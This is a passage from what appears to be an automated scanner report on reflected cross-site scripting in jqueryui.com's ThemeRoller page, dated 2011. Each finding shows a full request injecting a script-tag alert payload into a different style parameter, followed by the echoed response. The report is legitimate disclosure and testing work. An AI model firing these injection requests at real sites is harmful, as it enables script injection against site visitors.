   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.pngaf8d6"><script>alert(1)</script>cb13d41972f&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000
...[SNIP]...

2.50. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84fc2"><script>alert(1)</script>ac4e48b54f7 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png84fc2"><script>alert(1)</script>ac4e48b54f7&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png84fc2"><script>alert(1)</script>ac4e48b54f7&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

2.51. http://jqueryui.com/themeroller/ [bgTextureShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cad01"><script>alert(1)</script>9374f53a89e was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngcad01"><script>alert(1)</script>9374f53a89e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngcad01"><script>alert(1)</script>9374f53a89e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.52. http://jqueryui.com/themeroller/ [borderColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b67c"><script>alert(1)</script>0674f60c158 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=9999992b67c"><script>alert(1)</script>0674f60c158&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=9999992b67c"><script>alert(1)</script>0674f60c158&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

2.53. http://jqueryui.com/themeroller/ [borderColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57884"><script>alert(1)</script>b65ac416221 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa57884"><script>alert(1)</script>b65ac416221&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa57884"><script>alert(1)</script>b65ac416221&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorH
...[SNIP]...

2.54. http://jqueryui.com/themeroller/ [borderColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2586"><script>alert(1)</script>686e0674453 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999e2586"><script>alert(1)</script>686e0674453&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
g&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999e2586"><script>alert(1)</script>686e0674453&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada
...[SNIP]...

2.55. http://jqueryui.com/themeroller/ [borderColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8383"><script>alert(1)</script>069808b3d28 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0ac8383"><script>alert(1)</script>069808b3d28&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0ac8383"><script>alert(1)</script>069808b3d28&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

2.56. http://jqueryui.com/themeroller/ [borderColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58cc"><script>alert(1)</script>2f5ab107d8f was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaa58cc"><script>alert(1)</script>2f5ab107d8f&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaa58cc"><script>alert(1)</script>2f5ab107d8f&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8
...[SNIP]...

2.57. http://jqueryui.com/themeroller/ [borderColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6081e"><script>alert(1)</script>c30c52ff5c6 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa16081e"><script>alert(1)</script>c30c52ff5c6&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rd.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa16081e"><script>alert(1)</script>c30c52ff5c6&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaa
...[SNIP]...

2.58. http://jqueryui.com/themeroller/ [borderColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c1f"><script>alert(1)</script>bc465936fd5 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=99999913c1f"><script>alert(1)</script>bc465936fd5&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=99999913c1f"><script>alert(1)</script>bc465936fd5&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=f
...[SNIP]...

2.59. http://jqueryui.com/themeroller/ [cornerRadius parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 707ae"><script>alert(1)</script>2116519edf5 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

